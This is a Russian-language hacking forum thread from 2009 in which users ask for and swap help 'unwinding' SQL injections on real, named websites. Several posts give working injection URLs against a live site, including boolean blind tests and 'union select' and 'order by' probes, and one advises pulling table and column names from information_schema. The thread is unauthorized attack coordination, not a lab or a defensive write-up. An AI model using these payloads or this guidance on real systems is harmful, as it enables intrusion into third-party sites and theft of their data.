 |
|
17.03.2009, 15:29
|
|
Новичок
Регистрация: 14.01.2009
Сообщений: 2
С нами:
9116602
Репутация:
0
|
|
На запрос www.......&sid=115' в браузере ваваливается следующее:
Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc
Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?
|
|
|
17.03.2009, 15:46
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Сообщение от Nuke
На запрос www.......&sid=115' в браузере ваваливается следующее:
Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc
Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?
читай тут - http://forum.antichat.ru/thread43966.html
и тут - http://forum.antichat.ru/thread104591.html
и вообще много статей про Sql inj
|
|
|
|
17.03.2009, 18:19
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
У кого опыта побольше,помогите плиз раскрутить скулю, уже минут 30 бьюсь, безрезультатно... :'(
http://texeyes.com/contact.php?d=5'
|
|
|
|
17.03.2009, 18:39
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы
|
|
|
|
17.03.2009, 18:43
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Сообщение от Rubaka
слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы
А разве может быть слепая, если ошибка вываливается? o_O
Это ты показал, что скуля вообще есть, а то что она есть я и так знаю, исходя из ошибки 
|
|
|
|
17.03.2009, 18:44
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)
))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)
Последний раз редактировалось j0ker13; 17.03.2009 в 18:47..
|
|
|
|
17.03.2009, 18:51
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
так не ругается
Код:
http://texeyes.com/contact.php?d=5+union+select+1,2,3,4,5,6+--+
А так идет перенаправление
Код:
http://texeyes.com/contact.php?d=5+order+by+1+--+
Может по union select побрутить? |
|
|
|
17.03.2009, 19:05
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Сообщение от j0ker13
2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)
))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)
Я считал, что слепая скуля, это когда вывод ошибок отключён.Например возвращает разные результаты, а не обязательно интуицией.Если ошибаюсь-поправьте, я далеко не спец.
И ещё,я попросил помочь раскрутить, а не советы.Что это скуля я знаю и так.А блинд она или нет, это другой вопрос вроде.
Версия 5.0.67-community, больше ничего не узнал =(
|
|
|
|
17.03.2009, 19:14
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
2 Imperrous
так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
|
|
|
|
17.03.2009, 19:19
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Сообщение от jangle
2 Imperrous
так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
Да ну я не совсем уж нуб.Версию узнал со скули с другого сайта на серваке, но дело в том, что с неё ничего не вытянешь.Доступа к мускул.юзер нет, файл прив отключён, таблиц с админскими и юзерскими данными тоже нет, один мусор и всего то пару таблов.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
